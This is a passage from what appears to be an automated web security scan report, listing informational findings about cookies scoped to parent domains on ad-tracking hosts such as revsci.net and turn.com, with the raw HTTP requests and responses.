HzRXDdyvB20JlAOrMf7n0siam4TC00Mw/YvpjjbLWHyZ0dnQsonZtjgQ5iHhzvjHR0YICte13QDmwSAYDg0o2Z4B7LfU4=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:03:16 GMT; Path=/
Set-Cookie: rtc_yv6E=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:03:16 GMT; Path=/
Set-Cookie: NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a874&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Thu, 09-Jun-2011 11:03:16 GMT; Path=/
X-Proc-ms: 6
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:03:16 GMT
Content-Length: 930

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['J07717_10702','J07717_10435','J07717_10296','J07717_10134','J07717_10145','J07717_10449','J07717_10555','J07717_10985'];
var rsiExp=new
...[SNIP]...

13.76. http://pix04.revsci.net/K05539/b3/0/3/1003161/248479722.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K05539/b3/0/3/1003161/248479722.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K05539/b3/0/3/1003161/248479722.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.bloomberg.com%252Fnews%252F2011-05-05%252Fpingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html%253FNI%252520TAGS%253DALLTOP%252526SPNATOP%252526SPWWTOP%252526GENTOP%252526USTOP%252526OLYTOP%252526TOP%252526WWTOP%252526%2526_rsiL%253D0%26DM_EOM%3D1&C=K05539 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; rsiPus_UVQe="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"; rsi_us_1000000="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"; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; udm_0=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; 
rsi_segs_1000000=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; rtc_8mNC=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_8mNC=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:37 GMT; Path=/
Set-Cookie: rtc_IF8h=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:37 GMT; Path=/
Set-Cookie: NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4df0b081&1&10592&4dcb7bc9&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Thu, 09-Jun-2011 11:37:37 GMT; Path=/
X-Proc-ms: 4
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:37:36 GMT
Content-Length: 759

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['K05539_10579','K05539_10529','K05539_10592'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsi
...[SNIP]...

13.77. http://pixel.33across.com/ps/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=454&uid=4dc048d9159e4ae3 HTTP/1.1
Host: pixel.33across.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: 33x_ps=u%3D7708659745%3As1%3D1304431102142%3Ats%3D1304431102142

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA'
Set-Cookie: 33x_ps=u%3D7708659745%3As1%3D1304431102142%3Ats%3D1304431102142; Domain=.33across.com; Expires=Fri, 11-May-2012 11:49:38 GMT; Path=/
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01-Jan-70 00:00:01 GMT
X-33X-Status: 0
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 11:49:37 GMT
Connection: close
Server: 33XG1

GIF89a.............!...
...,...........L..;

13.78. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=1869178149;fpan=0;fpa=P0-487374334-1303349183888;ns=1;url=http%3A%2F%2Fmediacdn.disqus.com%2F1304984847%2Fbuild%2Fsystem%2Fdef.html%23xdm_e%3Dhttp%253A%252F%252Fwww.foxbusiness.com%26xdm_c%3Ddefault5912%26xdm_p%3D1%26;ref=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1305200291459;tzo=300;a=p-94WKwgUwZHlfo HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://mediacdn.disqus.com/1304984847/build/system/def.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EKcAJe8kjVmM-5GL0ZmY8frRi58oyBABwAEB3QaB1QCa0aWZVw8Ys9HNGFnDDCAJKLPR1KLMUgsqOEwdP-EQwgDB8QggINIOIAnRO7YKkZLHQxIIILsywStxxIP-FMWRtTqB4eaRAE0gDokgDDAOw0DRsQnSk5SjiyM

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ad.yieldmanager.com/pixel?id=669180&t=2
Set-Cookie: d=EMoAJe8kjVmM-5GL0ZmY8frRi58oyBABwwEB3QaB1QCa0aWJVAsQ8Ys9HNGFnDDCAJKLPR1KLMUgsqOEwdP-EQwgDB8QggINIOIAnRO7YKkZLHQxIIILsywStxxIP-FMWRtTqB4eaRAE0gDokgDDAOw0DRsQnSk5SjiyMA; expires=Wed, 10-Aug-2011 11:38:11 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Thu, 12 May 2011 11:38:11 GMT
Server: QS


13.79. http://r.turn.com/r/bd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/bd

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/bd?ddc=1&pid=18&uid=CAESEA4m3NbIVFSubIriNyJB6xg&cver=1 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&mktid=40&mpid=-1&fpid=-1&rnd=7978057364051197680&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=1%7C6%7C3%7C4%7C1002%7C6%7C7%7C4%7C9%7C10%7C1003%7C1006%7C2%7C1001%7C1004%7C12%7Cundefined%7Cundefined%7C1008; rds=15106%7C15104%7C15106%7C15105%7C15104%7C15105%7C15106%7C15105%7C15105%7C15104%7C15104%7C15104%7C15104%7C15104%7C15104%7C15105%7Cundefined%7Cundefined%7C15105; rv=1; uid=2931142961646634775

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:40:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 11:40:08 GMT

GIF89a.............!.......,...........D..;

13.80. http://r.turn.com/r/beacon

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/beacon?b2=6YtkBrDAE9IC5hFHjnB-yIAsYMfEACa-nO9phD-NOvPPVx7awJtIT5bFbQ7adJJ3wc3E_rvvWKH9Who8_my78Q&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=1%7C6%7C9%7C4%7C1002%7C6%7C1%7C4%7C9%7C10%7C1003%7C1006%7C2%7C1001%7C1004%7C12%7Cundefined%7Cundefined%7C1008; rds=15106%7C15104%7C15104%7C15105%7C15104%7C15105%7C15104%7C15105%7C15105%7C15104%7C15104%7C15104%7C15104%7C15104%7C15104%7C15105%7Cundefined%7Cundefined%7C15105; rv=1; uid=2931142961646634775

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:34 GMT; Path=/
Set-Cookie: pf=WDvFewANz5aN8ro--w_16OWau98iyOvVBtELDm2CHBX3Y07UZZPNWkK0EEUc7vAIfR8HsN28iFo6HdZJoYg637PetD2cA8xvvUoLcxur2sY9fHKHYMFFN8lXedjo-9PSl7cxfV18_Sz5Ng8ld_X1HRD_Z0wavqycrsQiFm9QZ_cEiXIeYRMvKu7l5KMvI7vm5dIdkRDTWQbgsHbEqQ37nNUVLZ0Aao2DGLgHCvs2_7zryFKliROAgCua8ygDf1pakle_qtze5tuAztFdGBKVECTB7Xzn-K67XFaryRa1HZxI2I4ae6CgiuH5tIIfNklQtPVt9L7Re7DJQWcHmwQpjCrTXh7XKumV-55sx735V56Jk4XT225c3_swkSHYmMoPRdlNOnviq7ipDvEZZ28_V5Fbphl8v0SeqcE1X29Q-XyrU8sC-NXPyqnKzoVqupwvxUtMxmzso7-ONZHGiWUGKIB5A9jubvG7JBvQXHiT1KdKWNG3ES2yEoYLCL7aUl8asmh83Bb_ySNRje2rNa0JxJcm9v4jeIQaPDoq3ACAJUl7IbOZHAHBMdmXe3UBRvsYdSrxi9Ecxa8kZThzZO6aeaas-roJj2Q-EkNpkXZbbvVeMLxvS4wRCkwyiayF00GI87TrIFafDjcHfusIoBCt22M89fvyKULVFnbtZFl9IUsQMSIRccJ6LX18XE1Nig_UUM1LGzqpcEk-rCFc1h0gpIm4Jd_QzLPdPOtdCEBAr8-8Upa6arFOpzab1pE0nDFPJkwT2KZhbD0CfG9KxUTYwAFaSuXROCWsvv1Xz_lvc5qDt8mPl3WKPA4r9Z1gJfOmbqLNFcfz6PEd-FrnEa4vrIqD8lkDUeWN7s4a9OueTLFISSSIDOlXxHejUMi7IABVrusAKookKb0pVS3987apnl6V-rQ-B6QHbtXcTAYqkWjgVeaX3klJElZGLoYa-ZuDh0Rayp3OOR_oU3ir4FomV_sy9RDK5uLzRDwQH4f7LIcJgVM65M6j7w5NDkyKKdRFf9BQS5tHIpXFtO5hdEHLwCf--aHQI9IDIlxI42NaIlUstjD2A4WMWerhztm-_a52YMN7bn25_9xS91STZcx-i0-bRhoYC7RhcSIMsIQ7o0TqwXhB0ipLjKZAXfISS2P-JyYO4jfdwozjhGCHarNmQ5BqLyG2YANF-FI5msFkFMG8UVACbcQT2qm5FtDkcuLLHIdQZhTfGyFVeET5DlWfImOBriO51iBaS4__ZMz5kSB3HnuOE2bKY8AnlZVaxKnjE3wXoM7fzLRqnlHVUJnantU17q7RnOwBeHgICWJsFQhc5wErZcKgnhVskq0bqyxhv_wjCGmN2gxKw0dhDnPYP_0Mmfi4j9yfMUwSdI9Lj7zJoKt8QnzKrSSc_RuX7K1PHnQtlNj8JmeKpHFW1PRfTb0fyYghIq-IITFkYc_uI9YSpJVpN2FNg5u_cdS3RjPCyL40JPKaH3V39NisQu1y367wTC7MmfceuL1HdWZa_yTHCCN0MTXDwR0tX3R7CB1nx3sRNCxKgOOP_38C_7cJoCDagfHqnmufnkMRoDa8dwQ; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:34 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 11:39:34 GMT

GIF89a.............!.......,...........D..;

13.81. http://r.turn.com/server/pixel.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=1%7C6%7C9%7C4%7C1002%7C6%7C1%7C4%7C9%7C10%7C1003%7C1006%7C2%7C1001%7C1004%7C12%7Cundefined%7Cundefined%7C1008; rds=15106%7C15104%7C15104%7C15105%7C15104%7C15105%7C15104%7C15105%7C15105%7C15104%7C15104%7C15104%7C15104%7C15104%7C15104%7C15105%7Cundefined%7Cundefined%7C15105; rv=1; uid=2931142961646634775; adImpCount=oZ2RNEVNFLw1rkIl8X-P-yLlEJpCYSMxdqNq6lvFdNFh-L3XcPmT4hHXOQgApIlYc3paHra2elvjH7hCid4MB0Y7JvKfSWNYnBltaP_EmvZ3jqED7k2YniAtZPVqfFWyqMSMg2wplko20za_zfIcXaDNf6CpNnts8TY8puNrbeBKdSjyOjws--qAHMHtbI6SyKBbydkRUpjuoBRWw9N2QWlLrIWdOijpjnNbDzxMY_cujCK2ugPRrtIQW8vfBoRxYKn_QpwzLsdSa65JQRSgSqax_mGBSfFmQ_yHDdekCqC92jCfL0XfIi3TKkhnegsTVS37Q_gdeVmm0ScUExZ1lbMOsVdmEL_0OjsXyZIn8546ZEBGWfN7asBcma8YFCDHyX74acgH1t-jhoUfZVFCNjWOWvzW5ZM77GgXH0zm8oWnOar6PZOl9RnITYOFSWGYaDzF7S4neHm1ckG4BLqONRpiMKjy3MU458qcQHaQL-0YgFsDPAGl-fbgR48rnFrJ6wT1IuXC7mrUivjuVTQThVRvdHABpFM3tD1v5DXCzZ64QHqMXP7RMlCGzImxlIQTzRgujrVm0N9W2BwnCL_E1EHZoee2LjdKxjrsrZzN8FgYwoof2TuxobdviXvpMnEv81pDaQWZ60S1K8hgQ0QQAXfu0wxu7TmpeZh8RAxVSexqJ2LLq9JdStUDbLo5lTJfPHD19oyCm6lqmb75TpSqL6pr8ipq7WyxO6Ew-I0HY5wJflUQTdxXpAW4Vnpqg7w44X_zfDuHKSw_Nn3jdP08Szc46mXt1UoqFp0M9jO1k8P42EGyAyRr7YhegJwMQPqqUCJ3ATQBZk5SYexXtpsdy6ax_mGBSfFmQ_yHDdekCqCUBFYqyi1fHJyWiOfcfMTfgr4RpaCyPW_NRBa32FhMmG9vYGefuwSJ954i6NepjOZKvS1xYZ0Ss4Q0D1A3NBoQyX74acgH1t-jhoUfZVFCNnao7o-KEpvjqYDs5soT116oq-KJHQhjQmU4bTdez02J9dQy-ZN7OOs-kGRGl7xpemvhGQ8hzIqlr1IrYQxp-xUYgFsDPAGl-fbgR48rnFrJh-3J1YLh96s2Sov-e5Z1o1RvdHABpFM3tD1v5DXCzZ4xxZ_RffFsDnywN1GkkZV_5Uv_RIvgSU7i6xm2dvbjnkHZoee2LjdKxjrsrZzN8Fjq5xh8lQ54K_u30ofXMDvN81pDaQWZ60S1K8hgQ0QQAeUZzYxmcCX-jt_KTaaPcVoJOvIBlFFRgh0aGkP2j5peH6Nkss0iuJOnMv3-09gfh2rrcKik1-oIrPtZSMAqqQ8JflUQTdxXpAW4Vnpqg7w4_2s4Bpo2uZfDxG0VZFB88Wk-VgL9u-XI58uBKvrz56O3iu9p-J24_EGM6hyagMn2YEmkLg5zZbK-JWIvvwrhwhPnDUjHFB6vhhdIIEEGSp2RC01-sirwoYxJf3ssEn49prH-YYFJ8WZD_IcN16QKoH0UI20YAgyxkHiw8lIAx_mnb-jXXCSXp2vVTXzmr9pZcL6p-XT3jN85vkgaZ8vUd92-2pnQD2n21e-ITIgQL_3JfvhpyAfW36OGhR9lUUI2W0_XCWcb8zsqQ8DimFX-Uu8v7HHrFL4nIbaIJQ_o1sPTa-Xsvzoz7XjqWNTCt3rZYrf92fSu
rscMt_1SV35mtBiAWwM8AaX59uBHjyucWslDB1wwanEOL6qzMCUQo0ieVG90cAGkUze0PW_kNcLNnm1cdjsO0JR2cllZViOXnQ3uVf8tWzflWdHziO5SokVWQdmh57YuN0rGOuytnM3wWK2DU6rMC-wJwy5QPx_qifTzWkNpBZnrRLUryGBDRBAB5WYyOFQ5ZRNL4sHU3RtcuUGDyFx-piXtjZp5ekRGkYdz2wXbubEN_3mjRNBG_Idw8LkqJ96VKyr7U-y-sK8_Lwl-VRBN3FekBbhWemqDvDiLN5_5A8LFSovW3C4K386c_Ql6lVvJ2R2O4nWyUN5iRLeK72n4nbj8QYzqHJqAyfbLD2N_CM7u1mydoDMYTC_mprH-YYFJ8WZD_IcN16QKoM2VicvKbeYEcyMla3yEoQ2RmR_rbYcUwB-9MYK1HnZwScQ9V5hHmJlTe-T75MjzqreTn2hkb9oAtGT_7YF8ZSHJfvhpyAfW36OGhR9lUUI2tqCUb5yc9vn09nLuvbx5GXq1-cHJUfnrcooYGbPAvcjTa-Xsvzoz7XjqWNTCt3rZ7d3RTRs3cZwFLR9Y320UThiAWwM8AaX59uBHjyucWslF1uoT-2LMDmY4614N6HcfVG90cAGkUze0PW_kNcLNnghS3x9ESIRPKJqzarj28HG_LjieMq13s3cgAdN8xM7aQdmh57YuN0rGOuytnM3wWD1crAQAhXFQgOVLYlHadeHzWkNpBZnrRLUryGBDRBAB4AW9z3L32rHXq7G7Z3kib_dL8EW6T8qzMgGN-UfAL4hvOC7fCrKQjypg3ZZDmIIRdMbH4VAaTP3yeuIT8bUYpjNxWhaps5334qiA6przrOBR9dy7mebSJ94duif8USNC67lakY1-Wx08qAAHUQtknHQ7xnjMvY9ljRz8Oso1hdOAl8yAkjzMu60avymcp27zhmAaygIZH6vh6o5wNjgjNdonijTulYljYeiITtnJ-obiQEWW_mIpBZLcLt_p7SN9vijLbJjf63yiGSwbKyG2dGugnhWf2jLB_cEY-73f83M-Qp-ZlRKwcQuBR1ztGiFSZj4LpSPmviro5cgHdk9eJt4MMqelir0IqM1jmPswFFzniMTjL4-dEMDP4r05gYjUzZycDMwIM-JRZdaXayxbU-AwRV7xlAm5ebgZQKvg7WfQ1UAcQ-GE71_vlGriBwl0yRDK3jK3JAuWDuOfs2KJrs13LhVuZ9GXfqJdAYatFTpdnV7arjamYRVy18OpW4nYo4YOSWlJdDfSV-fwq8HgeaN-3cp1FzgjDVOVLZ2VhYwL507hxRulwL5vm7cb7KsO1XFt8hxAzJqAYOCL7WjL0qxTgxm3fdOYdOttFZUxr5r0A9mv0F_QBoXzpi8rJ_c6DrDzy9pG89s1Q06scIKHZgyDJezpNhgVkSmU0kpar5BAJuG6G30x3tmAb2j7nSNJ4ut2MaV0ROqJMzw9NFFerOKSq0jn7Z8ml_Aq0G6qyi-_p_3NfTE1kiDIdgNbUC9syknt2eSBNZW0WI7HO06yZy2SvSB5gCfomHd71CeO9uXWDgvZffEe1VrTUdxOH4gfGVkOqzE_jRzdjQRhmyVCwoc_2QRp83dWLTsWWFAIqAtnczfxrFIRAQH9jWHUPud-tHjVA42UgJXi7E-Ez_fNnbIdhDyg95Mh1WycRjhJXv8ATRtHD8vb9Vg5SwvqNhrNZsvJnUfvCegfWPkjFXygnPnoVxBMRnVTY50l5bdMYetqdZbuYYw5z5lUxbXkdIEwU2hncdLYoeK7ANErfukyrvNB8AfsR6D54cbJAyko95iDfbO-X1OEuSdYaVrz3olMX3vxG0LpmKD-Soh53aYJpCPcsWWbSJo-8gq8nYPQ6ByEPHScXR_eqXeoOaqn2ootB5duWe6vOtfx6TZyGJGsbGD1xkmmTSZiXiOf1UbISqo; 
fc=Son_Yybuxp_4VLqW1c6IRgpgpID-Wq7vfB3O6HP3oULbQqNNvLUmxUNQQBPMgfFerRqQpaKBKyof5NYMw3qm97r0GrmP14kIO_P1S_Kd3R7cCRX28vmQ734FGllQxEga7WNeyCp05SdctLfte-TCTbsP4cT5ImSiiIJxR5UGOwfPwbRnR2LLF13q12TckziOyzAmjEmfIrmEjGls5nEu5ZuyzRHZQdTq6XVtL0hM6YVgYsYM5nTvlmY3l5bk4g84r-nKZ1rQQJqck6Yvy9KW3W91gPk0ifU2Wnpfq4coyDul4J5x1VDDQsLplNf7fxlsqch1kSkJnLuIM5kQxIBrA1AAJ5E2NNXlrPeQUMuax8t_TTqS7k2UZnQ2_qo9uJoS; pf=VuSdOqHBBMMWoIrvMn_lMP-eLv8nBibtrh2G8vjmtdsh8DjSlN9aC82olgy91sxHfR8HsN28iFo6HdZJoYg638wOOBBuwSDcinuc09qjksp0U_b-1nMI4TNTMGgzSCi8Z_hcfr_LjPBbXWGr-7VM9h8ALQwqWImyohuBQ27Y8Xw0cbFZZKJtQQndzE8GAKdmqCjC1Wmwdc7KyhZThEI6g8GR1G8u2_QHuqkmg4cRHp75P-oeEBUVDf5VwU9xuwcSHhDFJb2XUqEkLs7Domz_q3w_15kKm0BgK3JfnZEKs8fymw6sA4DbktT-nyiWCSpzKjDia36pxc3U4tO78q_HETEnlSA2STvxexbY71jYrbn4WfHJhGxsiIx-9I1zygek7Pf4A_sSnTuIap-4wUTplqXPpupoZ2aAs6pg_7GbeM0kYG_OQnZuGm01WR15o5NPoS1LMOxRBcktX-fjO0PajgmdjeQBgubJJsY05jsV2l9NZFR3RH9LciXYxcTjJepHfLuMsKI6owruPhF3gPtvzLZ9utGbxF13SV_uKAl4HKsBjKyxKk2G3uw_IYoHmbxATRKbLxavAe3UnLjo4PmSoYSZ7iWo8G3Uu8TuFRx5fRaquBZLTyYvv3Ocb-7--J-VtemUKW9z2kPibwP3gpIns6cCJlO7-0c-0RDCVEYnDUx1i2LElPrZXgQ5Byxk5xNmzexDfMU0BdXw9_SkVC-SNLPKk0ap-tAMXcPQnUmauymyXWJrQVUJgzNmFh7ksHv8OiCkGDhtnY3d1dmbv-udxKiDQTuAB18iFba0UGQ3JYe5Hmk4ucjwm6TjB_9nil97jekIjc-C8BS-uf96oebtAJsE9VJeaYcwjgb-01TibpxqYVdIDX7t5imD4mPAVzRantfh3RXY5XPyQCFOvjBuvXa7BG0yK1vm2RoZoMQreNJPS7GobV7I1cjjbuZswrRZ8pR06vJUoctQlrIJHdmY0phHtKP0mry4AwYHuhrHwtX0hRtaylr7YhxxdojmJl3YDZfqAfbohofv2ZcpScTu7Mv1IaFGZ4TJyXyc3GA7cL-6MReM3fg-Tj3A4SJdGFfIYrH1TzHu0JALHFm29Lz18bNTc21I0stlz_0W7pAuJ_HPjicCNrlo8DjF_CF9jI3kgrT0QZ53DFCYuonDAxoqp153GKXwrRX9BLEvde6VV8zIDZwhAfybaduI4Tjh2o_ApS_PmBayZLHGouKushfucVUk7wDNGMmzj4GVEEX8f-rUMF1anLVD